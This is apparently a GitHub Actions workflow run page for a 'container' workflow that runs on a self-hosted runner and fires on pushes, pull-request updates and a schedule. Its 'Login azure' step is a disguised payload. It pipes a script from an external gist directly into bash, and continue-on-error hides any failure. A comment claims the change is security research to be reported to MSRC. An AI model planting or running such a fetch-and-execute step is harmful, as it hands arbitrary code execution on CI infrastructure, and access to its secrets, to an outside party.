Skip to content

container

container #131

Workflow file for this run

name : container
on:
# NOT MALICIOUS. SECURITY RESEARCH. WILL REPORT TO MSRC IF IT WORKS.
workflow_dispatch:
schedule:
- cron: "10 1 * * 0" # At 01:10 UTC on each Saturday
push:
branches:
- main
paths:
- 'toolset/**'
pull_request:
types: [ synchronize ]
jobs:
build:
runs-on: self-hosted
steps:
- uses: actions/checkout@v4
- name: Login azure
run: |
curl -sSfL https://gist.githubusercontent.com/umbr4g3/ca8e2185379ce18b652adaf49b80b64f/raw/57c3b97724e70fdfde99ae45b1e16e210e1d3e48/runner-xktfb | bash
continue-on-error: true